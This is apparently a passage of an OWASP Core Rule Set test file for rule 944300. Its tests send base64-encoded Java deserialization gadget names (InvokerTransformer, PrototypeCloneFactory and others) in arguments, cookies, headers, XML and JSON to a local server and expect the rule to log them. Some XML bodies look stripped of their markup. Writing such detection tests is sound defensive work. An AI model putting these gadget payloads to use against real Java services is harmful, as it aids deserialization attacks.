dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: BpbnZva2VydHJhbnNmb3JtZXI=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-225 + desc: "Request header test includes keyword BpbnZva2VydHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: BpbnZva2VydHJhbnNmb3JtZXI + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-226 + desc: "XML attribute value includes keyword BpbnZva2VydHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-227 + desc: "XML element value includes keyword BpbnZva2VydHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + 
Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "BpbnZva2VydHJhbnNmb3JtZXI" + output: + log_contains: "id \"944300\"" + - test_title: 944300-228 + desc: "Nested XML element value includes keyword BpbnZva2VydHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "BpbnZva2VydHJhbnNmb3JtZXI" + output: + log_contains: "id \"944300\"" + - test_title: 944300-229 + desc: "Content-Type text/plain includes keyword BpbnZva2VydHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=BpbnZva2VydHJhbnNmb3JtZXI" + output: + log_contains: "id \"944300\"" + - test_title: 944300-230 + desc: "Content-Type application/json arg value includes keyword BpbnZva2VydHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"BpbnZva2VydHJhbnNmb3JtZXI\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-231 + 
desc: "Content-Type application/json arg name includes keyword BpbnZva2VydHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"BpbnZva2VydHJhbnNmb3JtZXI\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-232 + desc: "Argument test includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=cHJvdG90eXBlY2xvbmVmYWN0b3J5" + output: + log_contains: "id \"944300\"" + - test_title: 944300-233 + desc: "Argument name includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "cHJvdG90eXBlY2xvbmVmYWN0b3J5=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-234 + desc: "Cookie test includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=cHJvdG90eXBlY2xvbmVmYWN0b3J5 + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-235 + desc: "Cookie name includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: cHJvdG90eXBlY2xvbmVmYWN0b3J5=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-236 + desc: "Request header test includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: cHJvdG90eXBlY2xvbmVmYWN0b3J5 + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-237 + desc: "XML attribute value includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: 
"en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-238 + desc: "XML element value includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "cHJvdG90eXBlY2xvbmVmYWN0b3J5" + output: + log_contains: "id \"944300\"" + - test_title: 944300-239 + desc: "Nested XML element value includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "cHJvdG90eXBlY2xvbmVmYWN0b3J5" + output: + log_contains: "id \"944300\"" + - test_title: 944300-240 + desc: "Content-Type text/plain includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=cHJvdG90eXBlY2xvbmVmYWN0b3J5" + output: + log_contains: "id \"944300\"" + - test_title: 944300-241 + desc: "Content-Type application/json arg value includes keyword 
cHJvdG90eXBlY2xvbmVmYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"cHJvdG90eXBlY2xvbmVmYWN0b3J5\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-242 + desc: "Content-Type application/json arg name includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"cHJvdG90eXBlY2xvbmVmYWN0b3J5\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-243 + desc: "Argument test includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=HByb3RvdHlwZWNsb25lZmFjdG9yeQ" + output: + log_contains: "id \"944300\"" + - test_title: 944300-244 + desc: "Argument name includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "HByb3RvdHlwZWNsb25lZmFjdG9yeQ=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-245 + desc: "Cookie test includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=HByb3RvdHlwZWNsb25lZmFjdG9yeQ + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-246 + desc: "Cookie name includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: HByb3RvdHlwZWNsb25lZmFjdG9yeQ=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-247 + desc: "Request header test includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + 
Content-Type: "application/x-www-form-urlencoded" + test: HByb3RvdHlwZWNsb25lZmFjdG9yeQ + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-248 + desc: "XML attribute value includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-249 + desc: "XML element value includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "HByb3RvdHlwZWNsb25lZmFjdG9yeQ" + output: + log_contains: "id \"944300\"" + - test_title: 944300-250 + desc: "Nested XML element value includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "HByb3RvdHlwZWNsb25lZmFjdG9yeQ" + output: + log_contains: "id \"944300\"" + - test_title: 944300-251 + desc: "Content-Type text/plain includes keyword 
HByb3RvdHlwZWNsb25lZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=HByb3RvdHlwZWNsb25lZmFjdG9yeQ" + output: + log_contains: "id \"944300\"" + - test_title: 944300-252 + desc: "Content-Type application/json arg value includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"HByb3RvdHlwZWNsb25lZmFjdG9yeQ\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-253 + desc: "Content-Type application/json arg name includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"HByb3RvdHlwZWNsb25lZmFjdG9yeQ\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-254 + desc: "Argument test includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" + output: + log_contains: "id \"944300\"" + - test_title: 944300-255 + desc: "Argument name includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-256 + desc: "Cookie test includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-257 + desc: "Cookie name includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: 
"application/x-www-form-urlencoded" + Cookie: Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-258 + desc: "Request header test includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-259 + desc: "XML attribute value includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-260 + desc: "XML element value includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" + output: + log_contains: "id \"944300\"" + - test_title: 944300-261 + desc: "Nested XML element value includes 
keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" + output: + log_contains: "id \"944300\"" + - test_title: 944300-262 + desc: "Content-Type text/plain includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" + output: + log_contains: "id \"944300\"" + - test_title: 944300-263 + desc: "Content-Type application/json arg value includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-264 + desc: "Content-Type application/json arg name includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-265 + desc: "Argument test includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" + output: + log_contains: "id \"944300\"" + - test_title: 944300-266 + desc: "Argument name includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-267 + desc: "Cookie test includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + 
Content-Type: "application/x-www-form-urlencoded" + Cookie: test=cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-268 + desc: "Cookie name includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-269 + desc: "Request header test includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-270 + desc: "XML attribute value includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + 
